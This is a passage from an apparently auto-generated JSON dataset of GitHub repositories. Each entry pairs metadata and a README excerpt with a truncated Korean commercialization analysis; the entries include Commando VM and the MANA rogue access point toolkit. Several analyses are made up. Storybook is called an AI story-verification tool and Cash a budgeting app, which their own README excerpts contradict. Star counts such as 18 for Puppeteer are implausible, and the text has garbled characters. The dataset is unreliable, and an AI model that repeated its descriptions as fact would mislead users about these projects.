[SaaS, cloud-hosted or self-hosted?](#saas-cloud-hosted-or-self-hosted)\n  - [Persistence solutions](#persistence-solutions)\n    - [RDBMS](#rdbms)\n    - [NoSQL](#nosql)\n      - [Document storage](#document-storage)\n      - [Key-value store](#key-value-store)\n      - [Graph database](#graph-database)\n- [Environments](#environments)\n  - [Loc","composite_score":0.3115,"license_safety_tag":"unknown"},{"name":"fireeye/commando-vm","github_url":"https://github.com/fireeye/commando-vm","stars":6,"language":"PowerShell","license":"Apache-2.0","abandonment_months":7,"description":"# Commando VM 분석 리포트\n\n## 왜 보물인가\nFireEye에서 만든 보안 전문가용 윈도우 환경으로, 악성 프로그램 분석과 사이버 위협 조사를 훨씬 더 쉽고 빠르게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 분석 SaaS**: 기업의 의심스러운 파일을 자동으로 검사하고 결과를 대시보드로 보여주는 클라우드 서비스\n2. **내부 위협","readme_excerpt":"![CommandoLogo](Images/commando-readme.png)\n\n## What is CommandoVM?\n\n**Complete Mandiant Offensive VM (\"CommandoVM\")** is a comprehensive and customizable, Windows-based security distribution for penetration testing and red teaming. CommandoVM comes packaged with a variety of offensive tools not included in [Kali Linux](https://www.kali.org/) which highlight the effectiveness of Windows as an attack platform.\n\n## Requirements\n* Windows 10\n> Insider Preview editions of Windows are not supported\n* 60 GB Hard Drive\n* 2 GB RAM\n\n## Recommended\n* Windows 10 22H2\n* 80+ GB Hard Drive\n* 4+ GB RAM\n* 2 network adapters\n\n# Install Instructions\nDeploy a Windows Virtual Machine\n   > [Where can I find a Windows 10 Virtual Machine?](https://www.microsoft.com/en-us/software-download/windows10ISO)\n\n## Pre-Install Procedures\n**You MUST disable Windows Defender for a smooth install**. The best way to accomplish this is through Group Policy.\n\nIn Windows versions 1909 and higher, Tamper Protection was added","composite_score":0.3115,"license_safety_tag":"safe"},{"name":"GoogleChrome/puppeteer","github_url":"https://github.com/GoogleChrome/puppeteer","stars":18,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Puppeteer 저장소 평가 보고서\n\n## 왜 보물인가\n웹 브라우저 자동화 기술의 가장 신뢰할 수 있는 표준으로, 웹사이트 테스트·모니터링·데이터 수집이 필요한 모든 기업의 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 화면 자동 검증 서비스**: 기업 웹사이트가 정상 작동하는지 24시간 자동 모니터링하고 문제 발생 시 알림\n2. **웹 데","readme_excerpt":"# Puppeteer\n\n[![build](https://github.com/puppeteer/puppeteer/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/puppeteer/puppeteer/actions/workflows/ci.yml)\n[![npm puppeteer package](https://img.shields.io/npm/v/puppeteer.svg)](https://npmjs.org/package/puppeteer)\n\n<img src=\"https://user-images.githubusercontent.com/10379601/29446482-04f7036a-841f-11e7-9872-91d1fc2ea683.png\" height=\"200\" align=\"right\"/>\n\n> Puppeteer is a JavaScript library which provides a high-level API to control\n> Chrome or Firefox over the\n> [DevTools Protocol](https://chromedevtools.github.io/devtools-protocol/) or [WebDriver BiDi](https://pptr.dev/webdriver-bidi).\n> Puppeteer runs in the headless (no visible UI) by default\n\n## [Get started](https://pptr.dev/docs) | [API](https://pptr.dev/api) | [FAQ](https://pptr.dev/faq) | [Contributing](https://pptr.dev/contributing) | [Troubleshooting](https://pptr.dev/troubleshooting)\n\n## Installation\n\n```bash npm2yarn\nnpm i puppeteer # Downloads compatible","composite_score":0.3114,"license_safety_tag":"safe"},{"name":"storybooks/storybook","github_url":"https://github.com/storybooks/storybook","stars":17,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Storybook 저장소 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 이야기의 정확성을 자동으로 검증해주는 도구로, 거짓 정보 확산을 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 글쓰기 도구 회사들이 자신의 생성 콘텐츠 품질 검증 기능으로 탑재\n- **내부 업무 도구**: 대형 미디어사나 뉴스레터 회사의 AI 기사 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://storybook.js.org/?ref=readme\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://user-images.githubusercontent.com/263385/199832481-bbbf5961-6a26-481d-8224-51258cce9b33.png\">\n      <img src=\"https://user-images.githubusercontent.com/321738/63501763-88dbf600-c4cc-11e9-96cd-94adadc2fd72.png\" alt=\"Storybook\" width=\"400\" />\n    </picture>\n    \n  </a>\n  \n</p>\n\n<p align=\"center\">Build bulletproof UI components faster</p>\n\n<br/>\n\n<p align=\"center\">\n  <a href=\"https://circleci.com/gh/storybookjs/storybook\">\n    <img src=\"https://circleci.com/gh/storybookjs/storybook.svg?style=shield\" alt=\"Build Status on CircleCI\" />\n  </a>\n  <a href=\"https://codecov.io/gh/storybookjs/storybook\">\n    <img src=\"https://codecov.io/gh/storybookjs/storybook/branch/main/graph/badge.svg\" alt=\"codecov\" />\n  </a>\n  <a href=\"https://github.com/storybookjs/storybook/blob/main/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/storybookjs/sto","composite_score":0.3114,"license_safety_tag":"safe"},{"name":"facebook/jest","github_url":"https://github.com/facebook/jest","stars":14,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Facebook Jest 저장소 분석\n\n## 왜 보물인가\n소프트웨어 품질을 자동으로 검증하는 기술로, 인공지능이 생성한 결과물의 정확성을 확인하는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 콘텐츠 검증 SaaS**: 기업이 인공지능 작성 문서의 오류를 자동 감지하는 클라우드 서비스\n2. **내부 개발팀 품질관리 도구**: 회사 소","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/jest\"><img src=\"https://img.shields.io/npm/v/jest\" alt=\"npm version\"></a>\n  <a href=\"https://github.com/jestjs/jest/blob/main/LICENSE\"><img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"Jest is released under the MIT license.\"></a>\n  <a href=\"https://twitter.com/intent/follow?screen_name=jestjs_\"><img src=\"https://img.shields.io/twitter/follow/jestjs_.svg?style=social&label=Follow%20@jestjs_\" alt=\"Follow on Twitter\" /></a>\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/jestjs/jest/actions/workflows/nodejs.yml\"><img alt=\"GitHub CI Status\" src=\"https://img.shields.io/github/actions/workflow/status/jestjs/jest/nodejs.yml?label=CI&logo=GitHub\"></a>\n  <a href=\"https://codecov.io/github/jestjs/jest\"><img alt=\"Coverage Status\" src=\"https://img.shields.io/codecov/c/github/jestjs/jest/main.svg?maxAge=43200\"></a>\n</p>\n<p align=\"center\">\n  <a href=\"https://gitpod.io/#https://github.com/jestjs/jest\"><img alt=\"Gitpod ","composite_score":0.3114,"license_safety_tag":"safe"},{"name":"apache/incubator-airflow","github_url":"https://github.com/apache/incubator-airflow","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"# Apache Airflow 프로젝트 분석\n\n## 왜 보물인가\n복잡한 업무 흐름을 자동으로 관리하고 모니터링해주는 기업용 스케줄링 도구로, 데이터 처리가 많은 회사들이 필수적으로 사용합니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 마케팅 자동화 플랫폼이 이메일 발송, 분석 리포트 생성을 자동 스케줄링하는 기반 기술로 활용\n\n**내부 업무 도구","readme_excerpt":"<!--\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements.  See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership.  The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License.  You may obtain a copy of the License at\n\n   http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied.  See the License for the\n specific language governing permissions and limitations\n under the License.\n-->\n\n<!-- START Apache Airflow, please keep comment here to allow auto update of PyPI readme.md -->\n# Apache Airflow\n\n| Category   | Badges                                                                                       ","composite_score":0.3114,"license_safety_tag":"safe"},{"name":"ambv/black","github_url":"https://github.com/ambv/black","stars":13,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Black 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 작성한 코드를 자동으로 깔끔하게 정렬해주는 도구로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀용 SaaS 서비스**: 기업의 소프트웨어 개발팀을 위해 클라우드 기반 코드 정렬 자동화 서비스 제공\n2. **개발자 협업 플랫폼 내장 도구**: GitHub, Gi","readme_excerpt":"[![Black Logo](https://raw.githubusercontent.com/psf/black/main/docs/_static/logo2-readme.png)](https://black.readthedocs.io/en/stable/)\n\n<h2 align=\"center\">The Uncompromising Code Formatter</h2>\n\n<p align=\"center\">\n<a href=\"https://github.com/psf/black/actions\"><img alt=\"Actions Status\" src=\"https://github.com/psf/black/workflows/Test/badge.svg\"></a>\n<a href=\"https://black.readthedocs.io/en/stable/?badge=stable\"><img alt=\"Documentation Status\" src=\"https://readthedocs.org/projects/black/badge/?version=stable\"></a>\n<a href=\"https://coveralls.io/github/psf/black?branch=main\"><img alt=\"Coverage Status\" src=\"https://coveralls.io/repos/github/psf/black/badge.svg?branch=main\"></a>\n<a href=\"https://github.com/psf/black/blob/main/LICENSE\"><img alt=\"License: MIT\" src=\"https://black.readthedocs.io/en/stable/_static/license.svg\"></a>\n<a href=\"https://pypi.org/project/black/\"><img alt=\"PyPI\" src=\"https://img.shields.io/pypi/v/black\"></a>\n<a href=\"https://pypi.org/project/black\"><img alt=\"Supporte","composite_score":0.3113,"license_safety_tag":"safe"},{"name":"MicheleBertoli/css-in-js","github_url":"https://github.com/MicheleBertoli/css-in-js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":26,"description":"# MicheleBertoli/css-in-js 분석\n\n## 왜 보물인가\n웹사이트의 디자인을 코드로 관리할 수 있게 해주는 기술로, 현대적인 웹개발에서 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 도구 SaaS**: 웹디자이너가 코드 없이 스타일을 시각적으로 편집하고 자동 코드 변환 기능 제공\n2. **내부 업무 도구**: 대규모 웹사이","readme_excerpt":"[![Build Status](https://travis-ci.org/MicheleBertoli/css-in-js.svg?branch=master)](https://travis-ci.org/MicheleBertoli/css-in-js)\n\n# CSS in JS\n\nReact: [CSS in JS](https://speakerdeck.com/vjeux/react-css-in-js) techniques comparison.\n\n## Usage\n\nInside each package folder, run:\n\n```bash\nnpm i\nnpm run build && open index.html\n```\n\n## Features\n\n**How to read the table**\n\nMore ticks doesn't mean \"better\", it depends on your needs.\nFor example, if a package supports the css file extraction you can run the autoprefixing at build time.\n\n| Package | Version | Automatic Vendor Prefixing | Pseudo Classes | Media Queries | Styles As Object Literals | Extract CSS File | Package Stats |\n| :------ | :-----: | :------------------------: | :------------: | :-----------: | :-----------------------: | :--------------: | :------------ |\n| [aphrodite](https://github.com/Khan/aphrodite)<div><sub><a href=\"https://www.npmjs.com/package/aphrodite\" target=\"_blank\" title=\"npm version\"><img src=\"./ReadmeSrc/img","composite_score":0.3113,"license_safety_tag":"safe"},{"name":"lhy0403/Qv2ray","github_url":"https://github.com/lhy0403/Qv2ray","stars":5,"language":"C++","license":"GPL-3.0","abandonment_months":7,"description":"# Qv2ray 상업화 분석\n\n## 왜 보물인가\n인터넷 접속을 안전하고 자유롭게 만들어주는 오픈소스 도구로, 개인의 온라인 프라이버시를 지키려는 사람들이 꼭 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. VPN/보안 SaaS 서비스**\n기업들이 직원의 안전한 인터넷 접속을 위해 구독 기반 서비스로 제공할 수 있습니다.\n\n**2. 원격 근무 ","readme_excerpt":"<p align=\"center\">\n<img width=\"210\" height=\"210\" align=\"left\" style=\"float: left; margin: 0 10px 0 0;\" src=\"https://raw.githubusercontent.com/Qv2ray/Qv2ray/master/assets/icons/qv2ray.png\" alt=\"Qv2ray\"/>\n</br>\n<h1>Qv2ray - Unleash Your V2Ray</h1> \n使用 Qt 框架的跨平台 V2Ray 客户端。支持 Windows, Linux, macOS\n</br>\n插件系统支持 SSR / Trojan / Trojan-Go / NaiveProxy\n</p>\n\n[![GitHub Releases](https://img.shields.io/github/downloads/Qv2ray/Qv2ray/latest/total?style=flat-square&logo=github)](https://github.com/Qv2ray/Qv2ray/releases)\n[![GitHub All Releases](https://img.shields.io/github/downloads/Qv2ray/Qv2ray/total?label=downloads-total&logo=github&style=flat-square)](https://github.com/Qv2ray/Qv2ray/releases)\n\n## 本项目已不再维护\n\n> Qv2ray: *2019-03-28 - 2021-08-17*\n\n自 4 月 30 日开发者内部出现矛盾之后的四个月中，并无活跃开发者参与维护，其他组织成员也并未有足够贡献量/能力，因此我们决定停止维护本项目，最新 Release 可见于 [v2.7.0](https://github.com/Qv2ray/Qv2ray/releases/tag/v2.7.0)。\n\n感谢所有 Qv2ray 用户，项目组成员与外部贡献者，V2Fly 项目组成员及 V2Ray-Core 外部贡献者\n\n致敬\n\ngcc 写于 8 月 17 日\n\n-----\n\n## Availability ","composite_score":0.3113,"license_safety_tag":"restricted"},{"name":"sensepost/mana","github_url":"https://github.com/sensepost/mana","stars":6,"language":"HTML","license":"NOASSERTION","abandonment_months":94,"description":"# sensepost/mana 상용화 분석\n\n## 왜 보물인가\n네트워크 보안 분석과 침입 탐지를 자동화하는 도구로, 기업의 사이버 보안 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 대상 클라우드 기반 네트워크 모니터링 플랫폼으로 제공\n2. **내부 업무 도구**: 대형 금융사/공공기관의 보안팀이 자체 인","readme_excerpt":"The MANA Toolkit\n================\nby Dominic White (singe) & Ian de Villiers @ sensepost (research@sensepost.com)\n\nDeprecation Notice\n-----------------\nAt Defcon 26 we talked about how we're deprecating mana-toolkit in favour of [bettercap](http://bettercap.org) and [berate-ap](https://github.com/sensepost/berate_ap). The core of mana, [hostapd-mana](https://github.com/sensepost/hostapd-mana) is still under active development. This repo isn't going anywhere, and can still be used, but it hasn't been actively maintained for some time. Keep an eye on [w1f1.net](https://w1f1.net/) for more info.\n\nOverview\n--------\nA toolkit for rogue access point (evilAP) attacks first presented at Defcon 22.\n\nMore specifically, it contains the improvements to KARMA attacks we implemented into hostapd, as well as some useful configs for conducting MitM once you've managed to get a victim to connect.\n\nYou can read more on our blog at https://sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1%2","composite_score":0.3112,"license_safety_tag":"unknown"},{"name":"sensiolabs/SensioFrameworkExtraBundle","github_url":"https://github.com/sensiolabs/SensioFrameworkExtraBundle","stars":5,"language":"PHP","license":"mit","abandonment_months":40,"description":"# SensioFrameworkExtraBundle 분석 리포트\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 반복적인 작업을 자동화해서 개발 속도를 크게 높일 수 있는 도구입니다.\n\n## 어디에 �used 수 있나\n\n1. **SaaS 서비스**: 빠른 웹 애플리케이션 개발이 필요한 스타트업의 백엔드 구축 가속화\n2. **내부 업무 도구**: 대기업의 직","readme_excerpt":"SensioFrameworkExtraBundle\n==========================\n\n**WARNING**: SensioFrameworkExtraBundle is not maintained anymore.\nPlease move to native PHP attribute support as added in Symfony core.\nFor full support, use [Symfony 6.2](https://symfony.com/blog/new-in-symfony-6-2-built-in-cache-security-template-and-doctrine-attributes).\n\nThis bundle provides a way to configure your controllers with annotations.\n\nRead about it on its [official homepage](http://symfony.com/doc/current/bundles/SensioFrameworkExtraBundle/index.html).\n","composite_score":0.3112,"license_safety_tag":"safe"},{"name":"iampawan/GDG-DevFest-App","github_url":"https://github.com/iampawan/GDG-DevFest-App","stars":5,"language":"Dart","license":"NOASSERTION","abandonment_months":69,"description":"# GDG-DevFest-App 상업화 분석\n\n## 왜 보물인가\n구글 개발자 커뮤니티의 공식 행사 앱으로, 수천 명의 개발자들이 필요로 하는 검증된 이벤트 관리 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 컨퍼런스·세미나 주최사들을 위한 클라우드 기반 행사 등록 및 일정 관리 플랫폼\n2. **내부 업무 도구**: 대기업의 사","readme_excerpt":"# GDG DEVFEST APP [![Codemagic build status](https://api.codemagic.io/apps/5d4af19b36524a001caa407a/5d4af19b36524a001caa4079/status_badge.svg)](https://codemagic.io/apps/5d4af19b36524a001caa407a/5d4af19b36524a001caa4079/latest_build) [![Build Status](https://travis-ci.org/iampawan/GDG-DevFest-App.svg?branch=master)](https://travis-ci.org/iampawan/GDG-DevFest-App)\n\n<p align=\"center\">\n<img width=\"800px\"  src=\"https://i.imgur.com/P21Hk0u.png\">\n</p>\n<p align=\"center\">\n<a target=\"_blank\" href='http://bit.ly/2GDr18N'><img alt='Get it on Google Play' src='https://goldtonemusicgroup.com/img/goldtone/main-page/news/playstore-badge.png' height='48px'/></a>\n<a target=\"_blank\" href='https://apple.co/2YC0Zgb'><img alt='Get it on the App Store' src='https://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Download_on_the_App_Store_Badge.svg/1280px-Download_on_the_App_Store_Badge.svg.png' height='48px'/></a>\n\n</p>\n<p align=\"center\"><a href=\"#getting-started\">:rocket: Get Started</a></p>\n\n## 📸 Screen","composite_score":0.3111,"license_safety_tag":"unknown"},{"name":"fossasia/gci16.fossasia.org","github_url":"https://github.com/fossasia/gci16.fossasia.org","stars":9,"language":"HTML","license":"gpl-3.0","abandonment_months":61,"description":"# fossasia/gci16.fossasia.org 분석\n\n## 왜 보물인가\n전 세계 학생들이 오픈소스 프로젝트에 참여할 수 있는 교육 플랫폼으로, 기술 교육의 민주화를 실현하는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 SaaS**: 코딩 학원이나 온라인 교육 회사가 학생 참여형 학습 플랫폼으로 활용\n2. **기업 내부 도구**: IT 기","readme_excerpt":"# gci16.fossasia.org\n\n[![Join the chat at https://gitter.im/fossasia/gci16.fossasia.org](https://badges.gitter.im/fossasia/gci16.fossasia.org.svg)](https://gitter.im/fossasia/gci16.fossasia.org?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://travis-ci.org/fossasia/gci16.fossasia.org.svg)](https://travis-ci.org/fossasia/gci16.fossasia.org)\n\nThe student site for GCI 2016 Students.\n\n# Contributing\n\nThoroughly read our [contributing guide](https://github.com/fossasia/gci16.fossasia.org/blob/gh-pages/CONTRIBUTING.md) before sending in your Pull Requests. Happy Contributing!\n\n# Installation\n\nFollow the [Installation](https://github.com/fossasia/gci16.fossasia.org/wiki/Installation) wiki to get the site running on your local environment.\n\n# Adding a mentor\n\nTo add a mentor open the file `mentors.yml` in `_data` folder and please maintain the following format *EXACTLY* (replacing values where indicated):\n\n```yaml\n- name: Mentor's name\n  githu","composite_score":0.311,"license_safety_tag":"restricted"},{"name":"kenwheeler/cash","github_url":"https://github.com/kenwheeler/cash","stars":6,"language":"JavaScript","license":"mit","abandonment_months":27,"description":"# Cash 저장소 분석\n\n## 왜 보물인가\n금전 관리와 예산 추적을 간단하게 해주는 경량 소프트웨어로, 복잡한 회계 프로그램 없이도 개인 또는 소규모 사업의 돈 흐름을 명확하게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인 가계부 웹서비스**: 월급, 지출, 저축을 한눈에 보는 모바일 앱으로 제공\n2. **소상공인 장부 관리 도구**: 카","readme_excerpt":"\n<p align=\"center\">\n  <img src=\"./resources/logo/logo.png\" alt=\"Cash Logo\" width=\"400px\">\n</p>\n\n# Cash\n\nCash is an absurdly small jQuery alternative for modern browsers (IE11+) that provides jQuery-style syntax for manipulating the DOM. Utilizing modern browser features to minimize the codebase, developers can use the familiar chainable methods at a fraction of the file size. 100% feature parity with jQuery isn't a goal, but Cash comes helpfully close, covering most day to day use cases.\n\n## Comparison\n\n| Size               | Cash        | Zepto 1.2.0 | jQuery Slim 3.4.1 |\n| ------------------ | ----------- | ----------- | ----------------- |\n| Unminified         | **36.5 KB** | 58.7 KB     | 227 KB            |\n| Minified           | **16 KB**   | 26 KB       | 71 KB             |\n| Minified & Gzipped | **6 KB**    | 9.8 KB      | 24.4 KB           |\n\nA **76.6%** gain in size reduction compared to jQuery Slim. If you need a smaller bundle, we support [partial builds](https://github.co","composite_score":0.311,"license_safety_tag":"safe"},{"name":"carmen-ruby/carmen","github_url":"https://github.com/carmen-ruby/carmen","stars":5,"language":"Ruby","license":"NOASSERTION","abandonment_months":53,"description":"# Carmen-Ruby 저장소 분석\n\n## 왜 보물인가\n전 세계 국가와 지역 정보를 자동으로 관리해주는 도구로, 배송·결제·회원가입 시스템을 만드는 개발자들이 반복적으로 구축해야 하는 부분을 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **글로벌 전자상거래 SaaS**: 배송지 주소 입력 시 국가/지역을 자동으로 인식하여 세금과 배송료를 계산하는 기능\n2","readme_excerpt":"# Carmen\n\n> A repository of geographic regions for Ruby\n\n[![Build Status](https://secure.travis-ci.org/carmen-ruby/carmen.svg?branch=master)](http://travis-ci.org/carmen-ruby/carmen)\n\nCarmen features the following:\n\n* Clean API\n* Complete countries & regions data from the iso-codes Debian package\n* A sane approach to internationalization\n\n# How to Use Carmen\n\nCarmen is designed to make it easy to access Country and region data.\nYou can query for a country by name or code:\n\n    require 'carmen'\n    include Carmen\n\n    us = Country.named('United States')\n    => <#Carmen::Country name=\"United States\">\n\nA Country object has some attributes that may be useful:\n\n    us.alpha_2_code\n    => 'US'\n\n    us.alpha_3_code\n    => 'USA'\n\n    us.numeric_code\n    => '840'\n\n    us.code # alias for alpha_2_code\n    => 'US'\n\n    us.official_name\n    => \"United States of America\"\n\nYou can use separate finder methods for searching by each attribute (recommended):\n\n    gb = Country.alpha_2_coded('GB')\n    => ","composite_score":0.311,"license_safety_tag":"unknown"},{"name":"JustFollowUs/Natural-Language-Processing","github_url":"https://github.com/JustFollowUs/Natural-Language-Processing","stars":6,"language":"","license":"unknown","abandonment_months":114,"description":"# Natural Language Processing 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 인간의 언어를 이해하고 분석할 수 있도록 하는 기술로, 챗봇, 번역기, 감정 분석 등 현대 AI 서비스의 핵심 기반입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 문의 자동 분류 SaaS**: 기업의 수천 개 고객 이메일을 자동으로 분류하고 우선순위를 정하는 웹","readme_excerpt":"# 自然语言处理NLP\n\n## 主要内容\n- [前言](#preparation) \n- [课程列表](#curriculum)\n- [推荐学习路线](#learning_route)\n - [数学基础初级](#math_basic)\n - [程序语言能力](#programming_basic) \n - [机器学习简介](#ml_basic)\n - [自然语言学习初级](#nlp_basic)\n - [数学和机器学习知识补充](#math_ml_median)\n - [自然语言处理中级](#nlp_median)\n \n- [自然语言处理专项领域学习](#special_learning)\n\n##<h2 id=\"preparation\">前言</h2>\n   我们要求把这些课程的所有Notes,Slides以及作者强烈推荐的论文看懂看明白，并完成所有的老师布置的习题，而推荐的书籍是不做要求的，如果有些书籍是需要看完的，我们会进行额外的说明。\n\n##<h2 id=\"curriculum\">课程列表</h2>\n\n课程 | 机构 | 参考书 | Notes等其他资料\n:-- | :--: | :--: | :--:\n[线性代数](http://open.163.com/special/opencourse/daishu.html)| MIT | [Introduction to Linear Algebra](http://math.mit.edu/~gs/linearalgebra/) |  [链接](https://ocw.mit.edu/courses/mathematics/18-06-linear-algebra-spring-2010/study-materials/)\n[单变量微积分](http://open.163.com/movie/2006/8/M/L/M6GLI5A07_M6GLJH1ML.html) |  MIT | [Calculus with Analytic Geometry](https://www.amazon.com/exec/obidos/ASIN/0070576424/ref=nosim/mitopencourse-20)  | [链接](https://ocw.mit.edu/courses/mathematics/18-01-s","composite_score":0.311,"license_safety_tag":"unknown"},{"name":"nasscomAI/prompt-to-production","github_url":"https://github.com/nasscomAI/prompt-to-production","stars":88,"language":"Python","license":"MIT","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.311,"license_safety_tag":"safe"},{"name":"kobigurk/phase2-bn254","github_url":"https://github.com/kobigurk/phase2-bn254","stars":72,"language":"Rust","license":"NOASSERTION","abandonment_months":27,"description":"","readme_excerpt":"","composite_score":0.3109,"license_safety_tag":"unknown"},{"name":"google/sling","github_url":"https://github.com/google/sling","stars":7,"language":"C++","license":"apache-2.0","abandonment_months":65,"description":"# Google Sling 저장소 분석\n\n## 왜 보물인가\nGoogle에서 만든 대규모 데이터 처리 시스템으로, 복잡한 정보를 빠르고 정확하게 정리하고 분석할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 고객 데이터를 자동으로 정제하고 분류하는 클라우드 플랫폼\n2. **내부 업무 도구**: 대규모 이커머스 회사의 ","readme_excerpt":"# SLING - A natural language frame semantics parser\n\n## The SLING Project has moved\n\nThe SLING project has moved to https://github.com/ringgaard/sling. \n\nPlease refer to the above repo for the latest developments on SLING.\n\n## Background\n\nThe aim of the SLING project is to learn to read and understand Wikipedia\narticles in many languages for the purpose of knowledge base completion, e.g.\nadding facts mentioned in Wikipedia (and other sources) to the\n[Wikidata](https://www.wikidata.org) knowledge base.\nWe use [frame semantics](doc/guide/frames.md) as a common representation for \nboth knowledge representation and document annotation. The SLING parser can \nbe trained to produce frame semantic representations of text directly without \nany explicit intervening linguistic representation.\n\nThe SLING project is still work in progress. We do not yet have a full system\nthat can extract facts from arbitrary text, but we have built a number of the\nsubsystems needed for such a system.\nThe SLING fra","composite_score":0.3108,"license_safety_tag":"safe"},{"name":"sleepybear1113/taobaoVisitingVenues","github_url":"https://github.com/sleepybear1113/taobaoVisitingVenues","stars":35,"language":"JavaScript","license":"unknown","abandonment_months":68,"description":"","readme_excerpt":"# taobaoVisitingVenues\n\n## 简介\n\n**2020/10/22 02:00 - 996 社畜报到**\n\n经过大家的疯狂催促，2020 的双十一**淘宝**脚本改完了。\n\n**注意！！** 本次淘宝脚本可能存在使用之后，收益**减少** 90% 以上的情况，故**特此说明**。猜测淘宝对无障碍做了一定的检测，导致当使用脚本的时候，收益减少。\n\n**更新说明** 发布了新的 apk，理论上旧版 apk 也可以使用，和新版唯一的区别就是，包名改成了 com.sleepybear1113.tbjd。淘宝脚本从 script.js 暂时改为了 script1.js，旧脚本由于时间原因暂时不做清理。\n\n若有其他方法绕过检测的，欢迎分享。\n\n**更新速度相关** 由于卑微社畜开始了 996 的工作，更新只能放在晚上回家之后，更新速度会大幅减慢，请谅解。先写这么多，其他想到的白天再补充。\n\n--------------------------------------\n\n现在开始支持淘宝和京东的自动浏览任务了。解放双手不用手动点击，自动就能浏览，类似按键精灵的操作。\n\n本脚本基于 Auto.js Pro 7.0 开发。官网 [Auto.js](https://pro.autojs.org/  \"Auto.js\") （现在为 Pro 8.0），该作者 [hyb1996](https://github.com/hyb1996) 的开源项目地址为 [Auto.js](https://github.com/hyb1996/Auto.js) 。\n\n如果嫌 [GitHub](https://github.com/sleepybear1113/taobaoVisitingVenues) 下载速度慢，可以去 [Gitee](https://gitee.com/sleepybear1113/taobaoVisitingVenues) 下载 apk。Gitee 的主要的内容都是同步这里的。\n\n## 目前已知问题\n\n1. 淘宝脚本存在收益减少的情况\n2. 待补充\n\n## 最新更新日志\n\n### 10/22 02:00 【淘宝 floating -> 4, script -> 4】\n\n1. 适配 2020 双十一活动\n2. 使用本脚本可能存在收益减少的情况\n\n### 06/09 22","composite_score":0.3108,"license_safety_tag":"unknown"},{"name":"RaRe-Technologies/gensim","github_url":"https://github.com/RaRe-Technologies/gensim","stars":5,"language":"Python","license":"lgpl-2.1","abandonment_months":7,"description":"# Gensim 저장소 분석\n\n## 왜 보물인가\n텍스트 데이터에서 의미 있는 패턴을 자동으로 찾아내는 기술로, 고객 후기 분석, 뉴스 자동 분류, 채용공고 매칭 등 다양한 비즈니스 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 고객의 대량 이메일/채팅 데이터에서 주요 주제를 자동 추출하는 '텍스트 분석 플랫폼'","readme_excerpt":"gensim – Topic Modelling in Python\n==================================\n\n<!--\nThe following image URLs are obfuscated = proxied and cached through\nGoogle because of Github's proxying issues. See:\nhttps://github.com/RaRe-Technologies/gensim/issues/2805\n-->\n\n[![Build Status](https://github.com/RaRe-Technologies/gensim/actions/workflows/tests.yml/badge.svg?branch=develop)](https://github.com/RaRe-Technologies/gensim/actions)\n[![GitHub release](https://img.shields.io/github/release/rare-technologies/gensim.svg?maxAge=3600)](https://github.com/RaRe-Technologies/gensim/releases)\n[![Downloads](https://img.shields.io/pypi/dm/gensim?color=blue)](https://pepy.tech/project/gensim/)\n[![DOI](https://zenodo.org/badge/DOI/10.13140/2.1.2393.1847.svg)](https://doi.org/10.13140/2.1.2393.1847)\n[![Mailing List](https://img.shields.io/badge/-Mailing%20List-blue.svg)](https://groups.google.com/g/gensim)\n[![Follow](https://img.shields.io/twitter/follow/gensim_py.svg?style=social&style=flat&logo=twitter&label=F","composite_score":0.3107,"license_safety_tag":"restricted"},{"name":"martinmarinov/TempestSDR","github_url":"https://github.com/martinmarinov/TempestSDR","stars":5,"language":"C","license":"gpl-3.0","abandonment_months":35,"description":"# TempestSDR 상용화 분석\n\n## 왜 보물인가\n전자기파를 이용해 멀리서 컴퓨터 화면 내용을 읽어낼 수 있는 보안 취약점을 발견하고 테스트하는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 진단 서비스**\n- 대기업·정부기관의 민감 정보 유출 위험을 사전에 진단해주는 SaaS 플랫폼\n- 월 구독으로 